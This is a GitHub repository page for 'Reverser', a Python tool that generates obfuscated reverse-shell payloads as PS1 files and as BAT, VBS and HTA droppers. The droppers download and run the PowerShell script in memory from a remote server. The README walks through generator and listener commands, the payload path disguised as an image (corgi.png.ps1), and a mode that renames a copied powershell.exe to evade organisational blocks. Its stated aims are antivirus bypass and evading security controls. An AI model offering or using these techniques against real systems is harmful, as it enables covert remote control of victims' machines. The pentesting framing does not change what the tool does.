Skip to content

Reverse is a Python-based tool designed to create a Revshell payload in a variety of file types: PS1, BAT, VBS and HTA The tool knows how to generate payloads with obfuscation that work with coding to bypass various AV tools.

Notifications You must be signed in to change notification settings

ShkudW/Reverser

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

85 Commits
 
 
 
 
 
 
 
 

Repository files navigation

Reverser: Reverse Shell Generator with SSL Encryption

Overview

Reverse is a Python-based tool designed to generate obfuscated PowerShell scripts or batch files for establishing a reverse shell with SSL encryption. This tool can help in penetration testing scenarios where the goal is to bypass security mechanisms and establish a secure connection to a target machine.

Features

  • Reverse Shell with SSL Encryption: Generates PowerShell scripts that establish an encrypted reverse shell connection using SSL.
  • Obfuscation: Each generated PowerShell script uses randomly selected variable names to avoid signature-based detection by security tools.
  • Base64 Encoding: The PowerShell scripts are encoded in Base64 for additional obfuscation.
  • Batch File Generation: Create a batch file that downloads and executes the encoded PowerShell script directly from a remote server.
  • VBS File Generation: Create a VBS file that downloads and executes the encoded PowerShell script directly from a remote server.
  • HTA File Generation: Create a HTA file that downloads and executes the encoded PowerShell script directly from a remote server.
  • Customizable: Users can specify the IP address, port, and server URL for downloading the PowerShell script.

Prerequisites

  • Python 3.x
  • OpenSSL (for certificate generation)

Installation

Clone the repository:

python3 -m venv Reverser
sourve Reverser/bin/active
cd Reverse
git clone https://github.com/ShkudW/Reverser.git
cd Reverser
pip install -r requirements.txt

Explain

The tool can generate Three types of files, as chosen by the user:

  • A single PS1 file with obfuscation and Base64 encoding containing a Reverse shell payload.
  • An encoded BAT file that connects to a remote server to download and Execute the encoded PS1 file.
  • A VBS file that connects to a remote server to download and Execute the encoded PS1 file.
  • A HTA file that connects to a remote server to download and Execute the encoded PS1 file.

The BAT, HTA and VBS files, during their initial request to the server to download the PS1 into memory, are executed over an encrypted channel using a Self-Signed Certificate. After downloading the PS1 file into memory, the BAT and VBS files will decode the script and establish an encrypted communication channel to create the Reverse Shell

This way, we can ensure that the communication is encrypted end-to-end.

Usage

Creating only a PS1 file (obfuscated and Based64 encoded):

python3 Reverser.py -ip <Your_IP> -port <Your_PORT> -type ps1

image

Creating a VBS file with the tool and transferring it to the listener's directory:

python3 Reverser.py -ip <Your_IP> -port <Your_PORT> -type vbs -server https://<Your_Listener_Server_IP_For_Downloadin_PS1/download/photo/corgi.png.ps1>

image

Creating a BAT file with the tool and transferring it to the listener's directory:

python3 Reverser.py -ip <Your_IP> -port <Your_PORT> -type bat -server https://<Your_Listener_Server_IP_For_Downloadin_PS1/download/photo/corgi.png.ps1>

image


Opening The listeners:

Opening a listener with the OpenSSL server to receive the Reverse shell connection:

openssl s_server -accept <Your_PORT> -cert reception.pem -key reception.key -quiet

open a listener with our server to handle the initial connection for downloading the PS1 file from the BAT/VBS file:

python3 listener.py -https_port|-http_port <Your_Listener_Server_PORT>

All The traffic is encrypted: image

Getting an encrypted Reverse Shell after downloading the PS1 file to the memory via encrypted connection: image

Update for the Tool from 01/09/2024:

Update to the tool: I added the -lolbas flag. In this mode, the use of this flag will only apply when creating a VBS file. In scenarios where the use of powershell.exe is blocked within organizations, the script will create a VBS file that copies powershell.exe from its original path:

'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe'

to a new location where the user executing the payload has write permissions, and it will generate a new name for the powershell.exe file (each time, a different name will be generated).

This way, the download of the ReverseShell payload in PS1 format will run from the newly created powershell.exe file:

Creating the VBS file with using the lolbas: image

The VBS file: image

Enjoy :)

About

Reverse is a Python-based tool designed to create a Revshell payload in a variety of file types: PS1, BAT, VBS and HTA The tool knows how to generate payloads with obfuscation that work with coding to bypass various AV tools.

Topics

Resources

Stars

Watchers

Forks

Releases

No releases published

Packages

No packages published

Languages